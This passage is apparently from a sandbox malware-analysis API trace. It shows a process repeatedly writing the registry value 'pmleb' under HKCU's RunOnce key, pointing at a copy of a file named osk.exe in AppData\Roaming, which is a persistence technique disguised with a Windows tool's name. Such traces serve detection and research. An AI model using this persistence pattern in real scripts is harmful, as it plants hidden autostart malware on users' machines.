lpUsedDefaultChar=0x0) returned 54 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.315] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.315] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.316] RegCloseKey (hKey=0x280) returned 0x0 [0081.316] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.316] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.316] SetTimer (hWnd=0x20280, nIDEvent=0x20aa, uElapse=0xa, lpTimerFunc=0x0) returned 0x20aa [0081.316] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.328] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.328] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.328] KillTimer (hWnd=0x20280, uIDEvent=0x20aa) returned 1 [0081.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.329] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.329] IUnknown:Release (This=0x787518) returned 0x1 [0081.329] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.329] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.329] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.329] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.329] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0081.329] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.330] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x30 [0081.330] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.330] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0081.330] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.330] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.330] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.331] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.331] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.331] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.331] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.331] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.331] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.331] RegCloseKey (hKey=0x280) returned 0x0 [0081.331] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.331] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.331] SetTimer (hWnd=0x20280, nIDEvent=0x20ab, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ab [0081.331] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.344] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.344] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.344] KillTimer (hWnd=0x20280, uIDEvent=0x20ab) returned 1 [0081.344] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.344] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.344] IUnknown:Release (This=0x787518) returned 0x1 [0081.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.344] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.345] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.345] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.345] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0081.345] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0081.345] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x31 [0081.345] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.346] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x30 [0081.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.346] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.346] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.346] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.346] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.346] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.346] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.346] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.346] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.347] RegCloseKey (hKey=0x280) returned 0x0 [0081.347] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.347] SetTimer (hWnd=0x20280, nIDEvent=0x20ac, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ac [0081.347] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.360] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0081.360] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.361] KillTimer (hWnd=0x20280, uIDEvent=0x20ac) returned 1 [0081.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.361] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.361] IUnknown:Release (This=0x787518) returned 0x1 [0081.361] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.361] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.361] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.361] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0081.361] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.362] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0081.362] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.362] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x32 [0081.362] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.363] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x31 [0081.363] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.363] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.363] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.363] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.363] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.363] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.363] 
